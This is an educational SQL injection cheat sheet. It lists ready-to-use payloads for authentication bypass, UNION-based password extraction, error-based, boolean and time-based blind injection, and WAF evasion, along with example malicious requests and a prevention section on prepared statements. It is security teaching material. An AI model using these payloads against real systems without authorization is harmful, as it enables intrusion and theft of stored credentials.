Sqli cheat sheet
SQL Injection (SQLi) Cheat Sheet
Practical Guide for Learning
This cheat sheet is intended for education, labs, CTFs, and authorized security testing only.
Table of Contents
- Introduction to SQL Injection
- How SQL Queries Work
- Common SQL Injection Types
- Authentication Bypass
- UNION-Based SQLi
- Error-Based SQLi
- Boolean Blind SQLi
- Time-Based Blind SQLi
- Database Enumeration
- Database-Specific Payloads
- SQLi in POST Requests
- SQLi in Cookies & Headers
- Common WAF Bypass Concepts
- Secure Coding & Prevention
- Testing Methodology
- Useful Tools
- Quick Payload Reference
1. Introduction to SQL Injection
SQL Injection (SQLi) is a vulnerability that occurs when user input is inserted directly into SQL queries without proper sanitization or parameterization.
Example vulnerable PHP code:
$query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
If user input is not filtered, an attacker may manipulate the SQL query.
2. How SQL Queries Work
Normal query:
SELECT * FROM users WHERE username='admin' AND password='123456';
If input becomes:
admin' --
The final query becomes:
SELECT * FROM users WHERE username='admin' -- ' AND password='123456';
-- comments out the remaining query.
3. Common SQL Injection Types
| Type | Description |
|---|---|
| UNION-Based | Combines attacker query with original query |
| Error-Based | Uses database errors to leak information |
| Boolean Blind | Uses TRUE/FALSE responses |
| Time-Based Blind | Uses delays to confirm injections |
| Out-of-Band | Uses external channels like DNS |
| Second-Order SQLi | Payload executes later |
4. Authentication Bypass
Basic Payloads
' OR '1'='1
admin' --
' OR 1=1 --
Example
Vulnerable query:
SELECT * FROM users WHERE username='$user' AND password='$pass';
Injected username:
admin' --
Result:
SELECT * FROM users WHERE username='admin' -- ' AND password='x';
5. UNION-Based SQLi
UNION allows combining results from another SELECT statement.
Step 1: Find Column Count
ORDER BY 1 --
ORDER BY 2 --
ORDER BY 3 --
Or:
UNION SELECT NULL --
UNION SELECT NULL,NULL --
UNION SELECT NULL,NULL,NULL --
Step 2: Find Visible Columns
UNION SELECT 1,2,3 --
Step 3: Extract Data
UNION SELECT username,password,3 FROM users --
6. Error-Based SQLi
Uses database errors to reveal information.
MySQL Version Extraction
' AND extractvalue(1,concat(0x7e,version())) --
Current Database
' AND updatexml(1,concat(0x7e,database()),1) --
MSSQL
' AND 1=CONVERT(int,@@version) --
7. Boolean Blind SQLi
Application behavior changes based on TRUE/FALSE conditions.
TRUE Condition
' AND 1=1 --
FALSE Condition
' AND 1=2 --
Extract First Character
' AND SUBSTRING(database(),1,1)='a' --
8. Time-Based Blind SQLi
Used when no visible errors or output exist.
MySQL
' AND SLEEP(5) --
PostgreSQL
'; SELECT pg_sleep(5) --
MSSQL
'; WAITFOR DELAY '0:0:5' --
Conditional Delay
' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0) --
9. Database Enumeration
Current Database
SELECT database();
List Tables
SELECT table_name FROM information_schema.tables;
List Columns
SELECT column_name FROM information_schema.columns WHERE table_name='users';
Extract Data
SELECT username,password FROM users;
10. Database-Specific Payloads
MySQL
Version
SELECT @@version;
Current User
SELECT user();
Current Database
SELECT database();
PostgreSQL
Version
SELECT version();
Current Database
SELECT current_database();
MSSQL
Version
SELECT @@version;
Current User
SELECT SYSTEM_USER;
Oracle
Version
SELECT banner FROM v$version;
Current User
SELECT user FROM dual;
11. SQLi in POST Requests
SQL Injection is not limited to URL parameters.
Example POST request:
POST /login HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
username=admin'--&password=test
12. SQLi in Cookies & Headers
Some applications store user-controlled values inside:
- Cookies
- User-Agent
- X-Forwarded-For
- Referer
Example:
Cookie: trackingId=' AND SLEEP(5)--
13. Common WAF Bypass Concepts
Alternative Comments
/**/
Example:
UNION/**/SELECT/**/1,2,3
Case Manipulation
uNiOn SeLeCt
URL Encoding
%27 = '
Inline Comments
SEL/**/ECT
14. Secure Coding & Prevention
Use Prepared Statements
Secure PHP Example
$stmt = $pdo->prepare("SELECT * FROM users WHERE username=? AND password=?");
$stmt->execute([$username, $password]);
Input Validation
- Validate data types
- Use allowlists
- Reject unexpected characters
Least Privilege
Database accounts should only have required permissions.
Hide Errors
Disable verbose SQL error messages in production.
15. Professional Testing Methodology
Step 1: Identify Input Points
Check:
- GET parameters
- POST data
- Cookies
- Headers
- JSON bodies
Step 2: Test for Errors
Try:
'
Look for:
- SQL syntax errors
- HTTP 500
- Different responses
Step 3: Determine Injection Type
- Error-Based
- UNION-Based
- Blind
- Time-Based
Step 4: Enumerate Database
- Database name
- Tables
- Columns
- Sensitive data
Step 5: Document Findings
Always document:
- Vulnerable parameter
- Request/response
- Impact
- Remediation
16. Useful Tools
| Tool | Purpose |
|---|---|
| sqlmap | Automated SQLi testing |
| Burp Suite | Intercepting requests |
| OWASP ZAP | Web security testing |
| ffuf | Fuzzing |
| Nmap NSE | Database discovery |
17. Quick Payload Reference
Basic Test
'
Authentication Bypass
' OR '1'='1
Comment Operators
--
#
/* */
UNION Test
UNION SELECT NULL,NULL --
Database Version
@@version
Current Database
database()
Sleep Payload
SLEEP(5)
Boolean Test
AND 1=1
AND 1=2
Final Notes
SQL Injection testing is not about memorizing payloads only.
A strong penetration tester understands:
- SQL query logic
- Database behavior
- Web application flow
- Secure coding principles
- Detection methodology
- Reporting and remediation
The best hackers are the ones who deeply understand systems, not just payload lists.